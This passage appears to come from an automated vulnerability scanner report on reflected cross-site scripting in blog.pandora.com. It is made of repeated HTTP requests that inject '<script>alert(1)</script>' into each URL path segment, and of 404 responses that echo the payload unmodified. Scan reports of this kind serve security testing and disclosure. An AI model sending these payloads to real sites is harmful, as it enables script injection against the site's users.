Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
